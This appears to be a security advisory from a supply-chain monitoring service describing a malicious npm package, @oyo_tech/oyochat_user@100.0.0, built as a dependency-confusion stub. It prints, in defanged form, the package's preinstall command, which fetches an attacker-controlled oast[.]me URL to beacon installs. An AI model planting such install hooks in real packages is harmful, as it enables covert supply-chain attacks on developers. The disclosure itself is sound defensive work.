LWA-2026-11415 MAL-2026-14123 ↗ confirmed malware

@oyo_tech/oyochat_user@100.0.0

Malicious code in @oyo_tech/oyochat_user (npm)

T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel

Analysis

The package is a minimal stub (package.json + index.js) that runs a preinstall hook on install. The hook executes `node -e "fetch('hxxps://dc[.]installed[.]da24gtar47nuepat1pu053x3cgyweiaom[.]oast[.]me/'+process.env.npm_package_name)"`, making an outbound HTTP request to an attacker-controlled Burp Collaborator (oast[.]me) host with the package name appended to the URL path. This beacons install activity to the remote host. The package is published at version 100.0.0 on a scoped name with no repository, consistent with a dependency-confusion/version-squat stub.

analyzed by
Leitwacht
first seen
Aug 18, 2026, 12:05 PM
analyzed
Aug 18, 2026, 12:05 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.